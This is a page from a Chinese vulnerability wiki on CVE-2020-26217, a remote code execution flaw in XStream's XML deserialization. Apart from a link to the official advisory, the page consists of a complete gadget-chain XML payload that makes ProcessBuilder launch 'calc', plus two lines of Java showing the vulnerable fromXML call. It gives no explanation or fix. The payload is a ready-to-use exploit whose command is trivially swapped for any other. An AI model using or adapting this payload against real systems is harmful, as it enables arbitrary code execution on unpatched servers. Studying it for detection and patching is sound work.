menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right XStream chevron_right (CVE-2020-26217)XStream XML反序列化远程代码执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-26217)XStream XML反序列化远程代码执行.md
    2.18 KB / 2021-04-21 09:23:46
        # (CVE-2020-26217)XStream XML反序列化远程代码执行.md
    
    https://x-stream.github.io/CVE-2020-26217.html
    
    
    
    ```xml
    <map>
      <entry>
        <jdk.nashorn.internal.objects.NativeString>
          <flags>0</flags>
          <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
            <dataHandler>
              <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
                <contentType>text/plain</contentType>
                <is class='java.io.SequenceInputStream'>
                  <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                    <iterator class='javax.imageio.spi.FilterIterator'>
                      <iter class='java.util.ArrayList$Itr'>
                        <cursor>0</cursor>
                        <lastRet>-1</lastRet>
                        <expectedModCount>1</expectedModCount>
                        <outer-class>
                          <java.lang.ProcessBuilder>
                            <command>
                              <string>calc</string>
                            </command>
                          </java.lang.ProcessBuilder>
                        </outer-class>
                      </iter>
                      <filter class='javax.imageio.ImageIO$ContainsFilter'>
                        <method>
                          <class>java.lang.ProcessBuilder</class>
                          <name>start</name>
                          <parameter-types/>
                        </method>
                        <name>start</name>
                      </filter>
                      <next/>
                    </iterator>
                    <type>KEYS</type>
                  </e>
                  <in class='java.io.ByteArrayInputStream'>
                    <buf></buf>
                    <pos>0</pos>
                    <mark>0</mark>
                    <count>0</count>
                  </in>
                </is>
                <consumed>false</consumed>
              </dataSource>
              <transferFlavors/>
            </dataHandler>
            <dataLen>0</dataLen>
          </value>
        </jdk.nashorn.internal.objects.NativeString>
        <string>test</string>
      </entry>
    </map>
    ```
    
    ```
    XStream xstream = new XStream();
    xstream.fromXML(xml);
    ```
    
    ![image-20201117135642244](resource/(CVE-2020-26217)/media/image-20201117135642244.png)
    
    links
    file_download